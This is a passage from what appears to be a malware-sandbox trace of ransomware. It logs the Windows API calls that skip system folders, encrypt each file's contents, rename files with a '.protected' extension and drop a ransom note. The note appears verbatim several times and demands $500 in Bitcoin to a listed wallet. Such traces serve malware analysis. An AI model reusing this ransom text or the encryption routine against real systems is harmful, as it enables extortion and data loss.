ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.594] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.595] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.595] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.595] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.595] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.595] CloseHandle (hObject=0x164) returned 1 [0080.595] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Windows") returned -1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Program Files") returned -1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="Program Files (x86)") returned -1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="$Recycle.bin") returned 1 [0080.595] lstrcmpiW (lpString1="ml", lpString2="System Volume Information") returned -1 [0080.595] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml") returned 141 [0080.595] lstrcmpW (lpString1="ml", lpString2=".") returned 1 [0080.595] lstrcmpW (lpString1="ml", lpString2="..") returned 1 [0080.595] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*") returned 143 [0080.595] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.596] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\.") returned 143 [0080.596] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.596] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\..") returned 144 [0080.596] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.596] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.596] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.596] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.596] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.596] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.596] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.596] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.598] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.598] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.599] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.599] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json") returned 155 [0080.599] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.599] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x183, lpOverlapped=0x0) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x183, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x183, lpOverlapped=0x0) returned 1 [0080.600] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.600] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.601] CloseHandle (hObject=0x168) returned 1 [0080.601] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected") returned 165 [0080.601] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\messages.json.protected")) returned 1 [0080.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.602] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.602] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\RESTORE_FILES.txt") returned 159 [0080.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ml\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.602] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.602] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.603] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.603] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.603] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.603] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.603] CloseHandle (hObject=0x164) returned 1 [0080.603] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Windows") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Program Files") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="Program Files (x86)") returned -1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="$Recycle.bin") returned 1 [0080.603] lstrcmpiW (lpString1="mn", lpString2="System Volume Information") returned -1 [0080.603] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn") returned 141 [0080.603] lstrcmpW (lpString1="mn", lpString2=".") returned 1 [0080.603] lstrcmpW (lpString1="mn", lpString2="..") returned 1 [0080.603] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*") returned 143 [0080.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.604] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.604] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\.") returned 143 [0080.604] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.604] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.604] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\..") returned 144 [0080.604] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.604] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.604] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.604] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.604] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.604] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.604] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.604] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.605] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.605] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.605] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json") returned 155 [0080.605] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.605] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x1c3, lpOverlapped=0x0) returned 1 [0080.606] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.606] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x1c3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x1c3, lpOverlapped=0x0) returned 1 [0080.606] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.607] CloseHandle (hObject=0x168) returned 1 [0080.607] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected") returned 165 [0080.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\messages.json.protected")) returned 1 [0080.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.608] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\RESTORE_FILES.txt") returned 159 [0080.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\mn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.608] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow 